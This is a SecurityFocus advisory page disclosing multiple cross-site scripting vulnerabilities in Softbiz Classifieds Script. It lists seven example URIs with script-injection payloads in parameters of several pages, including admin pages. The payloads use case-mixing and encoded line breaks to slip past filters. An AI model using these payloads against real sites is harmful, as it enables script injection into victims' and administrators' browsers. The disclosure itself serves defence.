Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Softbiz Classifieds Script Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt
http://www.example.com/advertisers/signinform.php?msg=</title><ScRiPt%20%0a%0d>alert(455695710637)%3B</ScRiPt>&show_form=no
http://www.example.com/gallery.php?type=2&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(436145568828)%3B</ScRiPt>&cid=0
http://www.example.com/lostpassword.php?msg=<ScRiPt%20%0a%0d>alert(434915558474)%3B</ScRiPt
http://www.example.com/showcategory.php?cid=9&type=1&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(398524956207)%3B</ScRiPt
http://www.example.com/admin/adminhome.php?tmp=1&msg=</textarea><ScRiPt%20%0a%0d>alert(477365890784)%3B</ScRiPt
http://www.example.com/admin/index.php?msg=</textarea><ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt







 

Privacy Statement
Copyright 2008, SecurityFocus